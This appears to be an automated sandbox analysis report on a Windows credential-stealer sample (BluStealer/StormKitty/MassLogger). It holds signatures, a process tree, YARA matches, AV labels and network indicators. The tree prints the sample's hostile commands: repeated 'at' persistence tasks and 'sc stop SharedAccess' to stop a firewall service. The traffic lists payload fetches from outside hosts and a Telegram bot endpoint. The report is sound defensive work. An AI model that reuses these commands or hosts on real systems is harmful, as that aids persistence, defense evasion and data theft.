Windows Analysis Report
Lg3gn9y1Cj.exe

Overview

General Information

Sample Name: Lg3gn9y1Cj.exe
Analysis ID: 679096
MD5: 45061e4da841c2587d0890148705a142
SHA1: eb68218c1d70f3ba00f8190c8171ad1cfa2fb42a
SHA256: 6731f235ff78e22e5a0f1503542926bb707a95251b8cbd22c56fbd7fc5a8cbbf
Tags: exe, MassLogger

Detection

CryptOne, BluStealer, StormKitty
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Potential malicious icon found
Yara detected BluStealer
System process connects to network (likely due to code injection or exploit)
Detected CryptOne packer
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Antivirus / Scanner detection for submitted sample
Yara detected StormKitty Stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
PE file has a writeable .text section
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Changes security center settings (notifications, updates, antivirus, firewall)
Yara detected Generic Downloader
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Installs a global mouse hook
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)

Classification

  • System is w10x64
  • Lg3gn9y1Cj.exe (PID: 5744 cmdline: "C:\Users\user\Desktop\Lg3gn9y1Cj.exe" MD5: 45061E4DA841C2587D0890148705A142)
    • lg3gn9y1cj.exe (PID: 4392 cmdline: c:\users\user\desktop\lg3gn9y1cj.exe MD5: BEE47439C4960E2728594ECE9AD95BA7)
      • AppLaunch.exe (PID: 5840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
    • icsys.icn.exe (PID: 5032 cmdline: C:\Users\user\AppData\Local\icsys.icn.exe MD5: 4223968DA579570E05813854A134397B)
      • explorer.exe (PID: 5300 cmdline: c:\windows\system\explorer.exe MD5: A6F18E47BFFD6F5C4AA28B67644DBDBE)
        • spoolsv.exe (PID: 6024 cmdline: c:\windows\system\spoolsv.exe SE MD5: 3BA9E53239D4DCA948B4BFCBB08D7F34)
          • svchost.exe (PID: 244 cmdline: c:\windows\system\svchost.exe MD5: B61A3DA9B4DB4644497B9CC1BE87515F)
            • spoolsv.exe (PID: 404 cmdline: c:\windows\system\spoolsv.exe PR MD5: 3BA9E53239D4DCA948B4BFCBB08D7F34)
            • at.exe (PID: 5656 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 1016 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5128 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 1520 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 1756 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 1100 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5160 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 6060 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 4316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5868 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 6112 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 2872 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5200 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5064 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5140 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 3816 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 6172 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 6384 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • sc.exe (PID: 6400 cmdline: sc stop SharedAccess MD5: 24A3E2603E63BCB9695A2935D3B24695)
              • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • sc.exe (PID: 6416 cmdline: sc config Schedule start= auto MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • svchost.exe (PID: 2960 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2236 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5184 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3032 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2956 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 1564 cmdline: "C:\windows\system\explorer.exe" RO MD5: A6F18E47BFFD6F5C4AA28B67644DBDBE)
  • svchost.exe (PID: 5652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5484 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5008 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6308 cmdline: "C:\windows\system\svchost.exe" RO MD5: B61A3DA9B4DB4644497B9CC1BE87515F)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Lg3gn9y1Cj.exe | MALWARE_Win_A310Logger | Detects A310Logger | ditekSHen
  • 0x5c44e:$s1: Temporary Directory * for
  • 0x5c4aa:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
  • 0x5bf2e:$s6: Content-Disposition: form-data; name="document"; filename="
  • 0x5c3ce:$s7: CopyHere
  • 0x5c396:$s9: shell.application
  • 0x5c3fa:$s9: Shell.Application
  • 0x5c08e:$s10: SetRequestHeader
  • 0x5c55a:$s12: @TITLE Removing
  • 0x5c592:$s13: @RD /S /Q "
  • 0x9db8:$v1_2: AddAttachment
Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\lg3gn9y1cj.exe | MALWARE_Win_A310Logger | Detects A310Logger | ditekSHen
  • 0x17b14:$s1: Temporary Directory * for
  • 0x17b70:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
  • 0x175f4:$s6: Content-Disposition: form-data; name="document"; filename="
  • 0x17a94:$s7: CopyHere
  • 0x17a5c:$s9: shell.application
  • 0x17ac0:$s9: Shell.Application
  • 0x17754:$s10: SetRequestHeader
  • 0x17c20:$s12: @TITLE Removing
  • 0x17c58:$s13: @RD /S /Q "
Source | Rule | Description | Author | Strings
00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x327c:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x316c:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x3c02:$op3: 00 04 03 69 91 1B 40
  • 0x4452:$op3: 00 04 03 69 91 1B 40
00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_StormKitty | Yara detected StormKitty Stealer | Joe Security
00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.277724010.000000000733B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
          Source | Rule | Description | Author | Strings
          1.0.lg3gn9y1cj.exe .400000.0.unpack | MALWARE_Win_A310Logger | Detects A310Logger | ditekSHen
          • 0x17b14:$s1: Temporary Directory * for
          • 0x17b70:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
          • 0x175f4:$s6: Content-Disposition: form-data; name="document"; filename="
          • 0x17a94:$s7: CopyHere
          • 0x17a5c:$s9: shell.application
          • 0x17ac0:$s9: Shell.Application
          • 0x17754:$s10: SetRequestHeader
          • 0x17c20:$s12: @TITLE Removing
          • 0x17c58:$s13: @RD /S /Q "
          1.2.lg3gn9y1cj.exe .2b40000.1.unpack | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
          • 0x347c:$op1: 04 1E FE 02 04 16 FE 01 60
          • 0x336c:$op2: 00 17 03 1F 20 17 19 15 28
          • 0x3e02:$op3: 00 04 03 69 91 1B 40
          • 0x4652:$op3: 00 04 03 69 91 1B 40
          1.2.lg3gn9y1cj.exe .2b40000.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
          1.2.lg3gn9y1cj.exe .2b40000.1.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
          1.2.lg3gn9y1cj.exe .2b40000.1.unpack | JoeSecurity_StormKitty | Yara detected StormKitty Stealer | Joe Security
                No Sigma rule has matched
                No Snort rule has matched

                AV Detection

                Source: C:\Users\user\AppData\Local\icsys.icn.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe , Avira: detection malicious, Label: TR/Dropper.Gen
                Source: C:\Windows\System\svchost.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
                Source: C:\Windows\System\spoolsv.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
                Source: C:\Users\user\AppData\Roaming\mrsys.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
                Source: C:\Windows\System\explorer.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
                Source: C:\Users\user\AppData\Local\stsys.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
                Source: Lg3gn9y1Cj.exe, Virustotal: Detection: 87%
                Source: Lg3gn9y1Cj.exe, ReversingLabs: Detection: 100%
                Source: Lg3gn9y1Cj.exe, Avira: detected
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe , Metadefender: Detection: 25%
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe , ReversingLabs: Detection: 92%
                Source: Lg3gn9y1Cj.exe, Joe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\icsys.icn.exe, Joe Sandbox ML: detected
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe , Joe Sandbox ML: detected
                Source: C:\Windows\System\svchost.exe, Joe Sandbox ML: detected
                Source: C:\Windows\System\spoolsv.exe, Joe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\mrsys.exe, Joe Sandbox ML: detected
                Source: C:\Windows\System\explorer.exe, Joe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\stsys.exe, Joe Sandbox ML: detected
                Source: 9.0.spoolsv.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 52.2.svchost.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 1.0.lg3gn9y1cj.exe .400000.0.unpack, Avira: Label: TR/Dropper.Gen
                Source: 9.2.spoolsv.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 1.2.lg3gn9y1cj.exe .400000.0.unpack, Avira: Label: TR/Dropper.Gen
                Source: 7.2.spoolsv.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 34.2.explorer.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 4.0.icsys.icn.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 4.2.icsys.icn.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 0.2.Lg3gn9y1Cj.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 52.0.svchost.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 5.2.explorer.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 5.0.explorer.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 8.2.svchost.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 0.0.Lg3gn9y1Cj.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 34.0.explorer.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 8.0.svchost.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: 7.0.spoolsv.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                Source: Lg3gn9y1Cj.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknown, HTTPS traffic detected: 51.81.194.202:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: Binary string: C:\Users\KINGDOM\Documents\New Builder\Linq4you\Linq4you\obj\x86\Release\Linq4me.pdb source: lg3gn9y1cj.exe , lg3gn9y1cj.exe , 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, lg3gn9y1cj.exe , 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20220805_070938_705.etl.45.dr
                Source: Binary string: C:\Users\KINGDOM\Documents\New Builder\Linq4you\Linq4you\obj\x86\Release\Linq4me.pdbDO source: lg3gn9y1cj.exe , 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, lg3gn9y1cj.exe , 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe, Code function: 4x nop then push ebp, 0_2_00417143
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe, Code function: 4x nop then push ebp, 0_2_00416130
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe, Code function: 4x nop then push ebp, 0_2_004171D7
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe, Code function: 4x nop then push ebp, 0_2_004179F2
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe, Code function: 4x nop then push ebp, 0_2_00417190
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe, Code function: 4x nop then push ebp, 0_2_0041725A
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe, Code function: 4x nop then push ebp, 0_2_004172E5

                Networking

                Source: C:\Windows\System\explorer.exe, Domain query: vccmd01.googlecode.com
                Source: C:\Windows\System\explorer.exe, Domain query: vccmd02.googlecode.com
                Source: C:\Windows\System\explorer.exe, Network Connect: 51.81.194.202 443
                Source: C:\Windows\System\explorer.exe, Domain query: zxq.net
                Source: C:\Windows\System\explorer.exe, Domain query: vccmd01.zxq.net
                Source: C:\Windows\System\explorer.exe, Domain query: vccmd03.googlecode.com
                Source: C:\Windows\System\explorer.exe, Domain query: vccmd01.t35.com
                Source: C:\Windows\System\explorer.exe, Network Connect: 142.250.145.82 80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, DNS query: name: icanhazip.com
                Source: Yara match, File source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPE
                Source: Joe Sandbox View, JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
                Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Host: icanhazip.com | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /cmsys.gif HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko | Connection: Keep-Alive | Host: zxq.net
                Source: global traffic, HTTP traffic detected: GET /what-happened-to-the-old-zxq-website/ HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko | Connection: Keep-Alive | Host: zxq.net
                Source: global traffic, HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: vccmd01.googlecode.com | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: vccmd02.googlecode.com | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: vccmd03.googlecode.com | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /cmsys.gif HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: vccmd01.zxq.net | Connection: Keep-Alive
                Source: Joe Sandbox View, ASN Name: OVHFR OVHFR
                Source: Joe Sandbox View, IP Address: 104.18.114.97 104.18.114.97
                Source: svchost.exe, 00000027.00000002.537976090.000001E1CF665000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: svchost.exe, 00000027.00000002.537391592.000001E1CF612000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.ver)
                Source: AppLaunch.exe, 00000002.00000002.277628269.00000000072E5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.277032970.0000000007221000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.277673083.00000000072F3000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://icanhazip.com
                Source: AppLaunch.exe, 00000002.00000002.277628269.00000000072E5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.277032970.0000000007221000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://icanhazip.com/
                Source: AppLaunch.exe, 00000002.00000002.277665850.00000000072EE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://icanhazip.com4
                Source: AppLaunch.exe, 00000002.00000002.277628269.00000000072E5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: svchost.exe, 00000020.00000002.339302995.000001401B813000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://activity.windows.com
                Source: lg3gn9y1cj.exe , lg3gn9y1cj.exe , 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, lg3gn9y1cj.exe , 00000001.00000000.260922909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, lg3gn9y1cj.exe , 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, lg3gn9y1cj.exe , 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, Lg3gn9y1Cj.exe, lg3gn9y1cj.exe .0.dr, String found in binary or memory: https://api.telegram.org/bot
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.dr, String found in binary or memory: https://api.w.org/
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000020.00000002.340646208.000001401B84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337917326.000001401B846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
